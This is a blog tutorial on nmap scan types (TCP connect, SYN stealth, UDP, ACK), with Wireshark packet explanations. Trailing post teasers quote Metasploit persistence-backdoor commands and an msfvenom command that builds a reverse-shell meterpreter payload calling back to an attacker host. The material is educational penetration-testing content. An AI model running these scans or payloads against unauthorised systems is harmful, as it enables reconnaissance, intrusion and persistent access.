Nmap Scans a Deep Dive

-

                     Nmap Scans a deep dive

                                                    Part - I



Hello EveryOne Long Time No See Huh !!




As the heading suggests we are going learn about nmap scans. aren't you exicted !! 




Well the same goes with me !! 


 So let's dive in :)





Introduction to nmap :

Nmap (Network mapper) is an open source tool. Nmap is often used to determine alive hosts in a network, open ports on those hosts, services running on those open ports, and version identification of that service on that port. It can also run vulnerability assessment scripts to determine if a service is vulnerable. It can be used by penetration testers to identify open ports to gather more information about a target, or can be used by a security administrator to identify open ports in their systems but are not in use. In this blog we will go through all the popular scans that could be done using nmap and note this is doesn’t cover all the nmap scans but the popular scans . And without any further due let’s get into the tool scans and get our hands dirty and the real fun comes when we sniff the traffic generated by nmap and understand it , so we have got Wireshark here as well !!

Full tcp scan or full open scan :


Command :

 sudo nmap –sT TargetIpAddress

This scan attempts to make a full tcp connection on the destination port and then concludes if the port is open or closed according to the response .TCP connect scan is the default TCP scan type when SYN scan is not an option. 


Fig : 1.1




So it says port 80 is open , let’s examine it 

Fig : 1.2



In Fig : 1.2 we can see the packet exchange between which goes like : 

1 )  a syn packet is sent from the attacker machine to the destination machine (with destination port set to 80)

2) a syn/ack packet is sent from the target machine machine to the attacker machine 

3) an ack is sent from the attacker machine to the target machine (acknowledgement)

4)  just next to it an rst/ack packet is sent to the target machine from the attacker machine (Connection termination).

And you can observe that it made a full connection and then terminated the connection after the establishment


Now lets examine the closed port on the target machine 

Fig : 1.3 



In Fig : 1.3 we can see that a rst/ack packet is sent to the target machine in response to the syn packet sent by the attacker machine to the target machine and also remember that nmap will scan most popular 1000 ports regardless of the type of scan by default .

Note : 

There is no need to be root or sudo user to perform this full tcp scan but the host discovery method changes.If you have no idea about host discovery methods check you my blog that I wrote just for you :)


Did you know 💡: 

Something that most people don’t know about this scan is that Instead of writing raw packets as most other scan types do (Which we will be learning next), Nmap asks the underlying operating system to establish a connection with the target machine and port using the system call called connect . This is the same high-level system call that web browsers use to establish a connection and Nmap uses this API to obtain status information on each connection attempt rather that reading raw packet responses off the wire (which it does in case of other scans).


TCP SYN or Stealth scan : 

Command : 
 
sudo nmap –sS TargetIpAddress

stealth scan is also known as half open scan and you will see why in a minute

Fig : 1.4




In Fig : 1.4 The results of the scan are no different , so whats the point in using this scan ? 

Now if that's how you think , then I got a meme explaining our situation 




Yep ! you are right , they aren't the same , to see the difference let's dig deeper with the help of wireshark

Wireshark Capture if the port is open : 

Fig : 1.5




As you can see in the above Fig : 1.5 here we did not complete the tcp handshake , we have just sent the rst packet in return to syn/ack packet and this explains why this scan is called  as half open scan and you might get a doubt like why are we doing this ? What’s the difference ? Well this scan is used make the attacker stealthy by preventing the attacker from making a log entry which will then alert the network but this isn’t stealthy anymore the firewalls are pretty much advanced now. but its faster than the full tcp scan as we are chopping off the connection in between .

If the port is closed :

Fig : 1.6



This is similar to full tcp scan –sT cause the same syn flags is used to initiate the connection , so rst/ack packet is sent in return for the tcp syn packet


Did you know 💡:

Actually in this scan nmap requires raw-packet privileges which lets it send crafted packets . In this scan nmap sends the crafted packets to the target unlike in the case of full tcp connect scan where it asks the underlying OS to initiate the connection using the connect system call . In simple words nmap is going to send the packets to the target and not the OS .  After receiving the syn/ack packet in response to the syn packet though nmap can send the rst packet , it doesn't need to cause , the OS  also receives the syn/ack packet , which it doesn't expect because Nmap crafted the syn packet itself. So the OS responds to the unexpected syn/ack packet with a rst packet.

UDP Scan : 

Command: 

sudo nmap -sU TargetIpaddress
 
Before performing UDP scan firstly I would like to clear  that you can have a total of 65,535 tcp ports and another 65,535 udp ports.so in total there will be 131070 ports if we combine both tcp and udp ports. To be more precise there is a port 0 for tcp and port 0 for upd.
 
 
 
Yes that my legit reaction when I came to know this , you might already know this but I had no clue regarding this information !! , It's like someone saying : 



 In case you don’t know dns runs on tcp and as well as udp port 53. So if there is dhcp service running on the remote host then we shall use the upd scan to get the accurate results because they are udp ports and if you do tcp scan  on port 67/68(dhcp ports) it will not give you the accurate result . So it is very important know which type of protocol a particular service is using and scan accordingly , let me show an example as well Fig : 1.7

Fig : 1.7


 you can see the difference between the udp scan and tcp scan on the same port 22(ssh).

 We know that UDP works without any response from other party , and that what makes UDP scan a bit different and difficult to understand . But don't worry mate I am here just for you :) . But before we go through the scan behaviour , let me say that when nmap performs a udp scan it atcually sends an empty udp packet to the destination port and there will be no replay and this throws us into two possibilities : 

1) The target port has received the packet and left us with no response

Guess what possibility 2 might be ? ........

2) There might be a firewall in between which is just blocking all the packets !

For some protocol specific ports nmap instead of sending empty packets it adds a payloads to it which might make the destination port to respond . But as I said the payloads are only available for few ports which means you often see open | filtered status when you perform udp scans on the target .

UDP Scan Behaviour : 

Open : 

Any UDP response from the target

Open | filtered : 

If no response is received even after server re-transmissions

Closed : 

ICMP port unreachable error (type 3,code 3)

Filtered : 

Other ICMP unreachable errors (type 3, code 1, 2, 9, 10, or 13)

Did you know 💡 : 

I got a story and a video proof regarding the story that I am about to share with you that is from the dark web . So....


Story : 
 
Its a rainy night and there were teenagers in a haunted house playing truth or dare and a guy took dare . So taking that as opportunity an evil cybersecurity guy named nikhil told him to dance until the udp scan completes and let me share you a recently leaked glimpse of him dancing .
 
 
 
 
 
 
 
 
 
 
 
 

 
You know that I am just kidding right ?! 😅
 
Well I am I trying to say is that UDP Scan takes way long time to complete.
 
I Guess i didn't piss you  off , right my friend ? 😅 
 
 
 
Some of the reasons nmap udp scan is slow is because of the following reasons :

  • Open and filtered ports rarely send any response, leaving Nmap to time out and then conduct re-transmissions just in case the probe or response were lost 
  • It’s a drag if the port is closed cause of rate limit ICMP port unreachable messages. Linux and Solaris are particularly strict about this. For example, the Linux 2.4.20 kernel limits destination unreachable messages to one per second. So Nmap detects rate limiting and slows down accordingly to avoid flooding the network


To improve udp scan results :

Ideas for speeding your UDP scans up include scanning more hosts in parallel, doing a quick scan of just the popular ports first, scanning from behind the firewall, and using --host-timeout to skip slow hosts.
 
 

ACK Scan or firewall detection scan :

 
As we are talking about firewalls , many people think that windows firewall is an actual firewall . For those how thing that windows has good defensive system
 
Le Windows Firewall : 
 

 
Sorry Bill Gates macha 😅
 
But anyways moving on with the Scan : 
 
Have you every been in a dilemma that there might be a firewall blocking the packets from reaching the target ports ? Well this is going to help you find if there is a firewall in between . We could also determine weather the firewall is statefull or not
 
Command :

sudo nmap -sA TargetIpAddress

Fig : 1.8


In Fig : 1.8 we can see that ports 21,22,80 and 8080 are filtered and all remaining ports are unfiltered . 

Wireshark analysis on port 80 on the basis of previous output : 


you see , you see my friend !! there is no reply from the destination port for the ack packet we have sent that is because I have set a firewall to drop all the tcp packets :) (don't know why I am using this thing a lot :) ) .
 
 Wireshark analysis on unfiltered port on the basis of previous output :


Note : 
  • remember Ack scan does not look for open or closed ports , all it does is checks weather the port is filtered or not. 
  • If the ack sent by the attacker reached the target port irrespective of the target port state (open or close) we will get an rst packet in return and thus we can confirm that the port is unfiltered.
  • So in more detail , While scanning systems with ack packets , open and closed ports will both return a RST packet. Nmap then labels them as unfiltered, meaning that they are reachable by the ACK packet, but whether they are open or closed is undetermined.
nmap depicts the states of the ports as follows :
 
Unfiltered :

If a TCP RST packet is received in return from the target port
 
Filtered :
 
No response received even after several retransmissions
Packets with ICMP unreachable error  (type 3, code 1, 2, 3, 9, 10, or 13)


So....................... Shall we stop here ?


Ok Then Byeeeeeeeeeeeeeeee................................ See ya in Part 2 :)

 


\😅
😅

Comments

Post a Comment

Popular posts from this blog

Learning Nmap Host Discovery with iptables and Wireshark Analysis

-
Image
Learning Nmap Host Discovery with Iptables  and Wireshark Analysis Finally the wait is no longer , we are going to learn host discovery using nmap in a very detailed way. Well you might say that there are many videos and blogs out there what is special about this one ? , In this blog I will be sharing my knowledge after going through several videos , nmap book and many other blogs in the most detailed way possible , well you will see the difference after going through the blog . When I say I really mean it . Heads up !! you must know basis of iptables before going through the blog  and you might ask why ? coz we not just learning just by saying that nmap blocks the packets so this host discovery isn't going to work.  we are going to block the packets and run the discovery again and bypass the our rules ourselves that how this blog is designed very thing is practical practical and practical . How cool is that ?!. well I wrote blog on iptables just for you !! click here an...
Read more

Persistence Techniques with Metasploit - Part 6

-
Image
     Persistence Techniques with Metasploit Getting a shell in real world requries a lot of hardwork and research , All this work put in so that we will be ok to loose the session when the user logs off or turns the computer off ? Hell no ! , we need to make our connection persistance so that we can get back alive when the computer's on or when the user logs in. And we will be taking a look into the post module section which helps us to make our connection persistence after exploiting the target machine. Note : For creating a persistence backdoor you should have already compromised the target machine and have the meterpreter shell  Pov : you have already exploited the target machine and had a meterpreter shell Commands :  use exploit/windows/local/persistence_exe show options Fig : 1.1 In Fig : 1.1 we can see the different options availabe REXENAME option defines the name of the exe file the module is going to put on the remote system REXEPATH denotes the local ...
Read more

Generating Payloads using Msfvenom - Metasploit Part 5

-
Image
Generating and encoding Payloads using  Msfvenom Well aparantely msfvenom is a seperate tool from msfconsole which is used to generate payloads but it doesn't mean that we cannot create payloads using msfconsole but the advantage of using msfvenom is that there is no need for us to be in the msfconsole to generate payloads but no worries we will be covering both the methods :) So let's hop onto it shall we ! Command : msfvenom --list Fig : 1.1 In Fig : 1.1 we can see using the command we can list a brief instructions on how to use different options with it To list different types of modules we can use Command : msfvenom --list [modules] eg:payloads Fig : 1.2 In Fig : 1.2 we can see the different types of available payloads we can use with msfvenom and obviously it is going to take a while when you execute the command to load loads of payloads Let's create a meterpreter staged payload Command : msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=port_number -...
Read more